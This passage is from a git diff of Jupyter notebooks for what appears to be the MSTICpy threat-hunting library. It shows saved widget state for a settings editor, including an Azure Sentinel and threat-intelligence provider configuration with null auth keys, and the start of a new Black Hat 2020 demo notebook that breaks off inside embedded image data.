+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextareaModel",
+      "state": {
+       "layout": "IPY_MODEL_b21867bc82504992bc515320bbc58b37",
+       "style": "IPY_MODEL_3ac23f8c040d4a438799acb9617b4c39",
+       "value": "{'AzureSentinel': {'Workspaces': {'ASIHuntOMSWorkspaceV4': {'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n                                                            'WorkspaceId': '52b1ab41-869e-4138-9e40-2a4457f09bf0'},\n                                  'CCIS': {'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n                                           'WorkspaceId': 'd2a20a39-c646-4783-a490-59899e3a6591'},\n                                  'Centrica': {'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n                                               'WorkspaceId': '1ab17267-66c0-473e-8a80-da21cc7a0828'},\n                                  'CyberSecuritySoc': {'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n                                                       'WorkspaceId': '8ecf8077-cf51-4820-aadd-14040956f35d'},\n                                  'Default': {'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n                                              'WorkspaceId': '52b1ab41-869e-4138-9e40-2a4457f09bf0'},\n                                  'RedmondSentinelDemoEnvironment': {'TenantId': '35a9e601-82db-42da-b521-efc4a2f6783c',\n                                                                     'WorkspaceId': 'a927809c-8142-43e1-96b3-4ad87cfe95a3'}}},\n 'KeyVault': {'Authority': 'global',\n              'AzureRegion': 'East US',\n              'ResourceGroup': 'ASIHuntOMSWorkspaceRG',\n              'SubscriptionId': '40dcc8bf-0478-4f3b-b275-ed0a94f2c013',\n              'TenantId': '72f988bf-86f1-41af-91ab-2d7cd011db47',\n              'UseKeyring': True,\n              'VaultName': 'mstic-ianhelle'},\n 'OtherProviders': {'GeoIPLite': {'Args': {'AuthKey': {'KeyVault': None}},\n                                  'Provider': 'GeoLiteLookup'},\n                    'IPStack': {'Args': {'AuthKey': {'KeyVault': None}},\n                                'Provider': 'IPStackLookup'}},\n 'QueryDefinitions': None,\n 'TIProviders': {'OTX': {'Args': {'AuthKey': {'KeyVault': None}},\n                         'Primary': True,\n                         'Provider': 'OTX'},\n                 'OpenPageRank': {'Args': {'AuthKey': {'KeyVault': None}},\n                                  'Primary': True,\n                                  'Provider': 'OPR'},\n                 'TorExitNodes': {'Primary': True, 'Provider': 'Tor'},\n                 'VirusTotal': {'Args': {'AuthKey': {'KeyVault': None}},\n                                'Primary': True,\n                                'Provider': 'VirusTotal'},\n                 'XForce': {'Args': {'ApiID': {'KeyVault': None},\n                                     'AuthKey': {'KeyVault': None}},\n                            'Primary': True,\n                            'Provider': 'XForce'}}}"
+      }
+     },
+     "f9a76daeec5b460e8594c2ecff0542d1": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Delete",
+       "layout": "IPY_MODEL_a401941d9f3d4e2ca6c3460843d09506",
+       "style": "IPY_MODEL_3b3327f5f4b44792a7aa6729d84eb300"
+      }
+     },
+     "f9c3ed33620e4c409b19a16a5e2bdf48": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "border": "solid gray 1px",
+       "margin": "1pt",
+       "padding": "5pt",
+       "width": "99%"
+      }
+     },
+     "fa62ecbf9fca48ceb412703ec04668ed": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "VBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_131a8d834df34ffc95a8ba0d3160c603",
+        "IPY_MODEL_f0d6925abadf4698aae2a91a4c564663",
+        "IPY_MODEL_6eb28a00d025431fb8668f2dddbeb025"
+       ],
+       "layout": "IPY_MODEL_6109978aca0a482ba0127d57c2e82bdc"
+      }
+     },
+     "fb46133b44af456595e4392e3da0c4a2": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "fb51a0af09594db4b0ed773c3b947d9d": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "fb8e12ad379a47b697b74411d93f862b": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DropdownModel",
+      "state": {
+       "_options_labels": [
+        "AzureCLI",
+        "Splunk",
+        "LocalData",
+        "Mordor"
+       ],
+       "description": "Add prov",
+       "index": null,
+       "layout": "IPY_MODEL_ea01314cfeb94cf5833477ebb4103121",
+       "style": "IPY_MODEL_16dbbff9539249999cfc12f92a57010f"
+      }
+     },
+     "fc3dfaf231994e489f194fbbe758fe37": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "height": "150px",
+       "width": "99%"
+      }
+     },
+     "fc49d7adac414aa8b261504449a7b5b6": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "LabelModel",
+      "state": {
+       "layout": "IPY_MODEL_ea93c8f639114f12bc2a44a396545f66",
+       "style": "IPY_MODEL_9e62664d4a334e688515c3d485a373cb",
+       "value": "Settings for Threat Intelligence Providers"
+      }
+     },
+     "fcb8b83a29584eac86678d4b791496fd": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "fd10f543f5f24842832e0a99cdc18a7f": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "fd7b950590534dba9ff47b394d3b0cf7": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "70px"
+      }
+     },
+     "fdb61005274e437bbaf576fe93654f00": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "HBoxModel",
+      "state": {
+       "children": [
+        "IPY_MODEL_09e4401dd9cc40c59272a269c96ffcff",
+        "IPY_MODEL_e94f302ee2d74244b5651d252b74d761"
+       ],
+       "layout": "IPY_MODEL_fef43acaf30e450cbfbf9c66c9fdaac8"
+      }
+     },
+     "fe225740c8cf4042962fa6e0781d1f93": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "fe2b11d4cfc6484197363ab86e5c24f0": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Save file",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_2a16e3a3c48c41e999c742e2a9868d95"
+      }
+     },
+     "fe6ed8ffe27c424cb09e275e98f7af3e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "DescriptionStyleModel",
+      "state": {
+       "description_width": "150px"
+      }
+     },
+     "fe7906d23c6047e8bad2542ae8dbe0f0": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {
+       "width": "200px"
+      }
+     },
+     "fece5cef3c134fd5bdcff82d4088e689": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonStyleModel",
+      "state": {}
+     },
+     "fef43acaf30e450cbfbf9c66c9fdaac8": {
+      "model_module": "@jupyter-widgets/base",
+      "model_module_version": "1.2.0",
+      "model_name": "LayoutModel",
+      "state": {}
+     },
+     "ff53599855a04f2083ee7bb547db1e74": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "TextModel",
+      "state": {
+       "description": "ResourceGroup",
+       "layout": "IPY_MODEL_307293a98db44c97848b363bc6f39f99",
+       "style": "IPY_MODEL_f19c9696ac2843b290a1b0a144a3e4f1",
+       "value": "ASIHuntOMSWorkspaceRG"
+      }
+     },
+     "ff5e66827bea4fba8caf84500bb34b9e": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "ButtonModel",
+      "state": {
+       "description": "Load default",
+       "layout": "IPY_MODEL_7b32d76ea7a9413b84f9f8813692cf0e",
+       "style": "IPY_MODEL_bcd23f4d1176463e81b64c428861eedc"
+      }
+     },
+     "ffe51e5ff70f4209800dfd26f7aacd30": {
+      "model_module": "@jupyter-widgets/controls",
+      "model_module_version": "1.5.0",
+      "model_name": "AccordionModel",
+      "state": {
+       "_titles": {
+        "0": "Search"
+       },
+       "children": [
+        "IPY_MODEL_fa62ecbf9fca48ceb412703ec04668ed"
+       ],
+       "layout": "IPY_MODEL_2decd307abe642d58e42a1c88add7379",
+       "selected_index": null
+      }
+     }
+    },
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/MSTICpy_Blackhat_Demo_2020.ipynb b/docs/notebooks/MSTICpy_Blackhat_Demo_2020.ipynb
new file mode 100644
index 000000000..6fd530ee7
--- /dev/null
+++ b/docs/notebooks/MSTICpy_Blackhat_Demo_2020.ipynb
@@ -0,0 +1,4926 @@
+{
+ "cells": [
+  {
+   "attachments": {
+    "070aeced-e5f5-4534-85e5-688b0031c657.png": {
+     "image/png": "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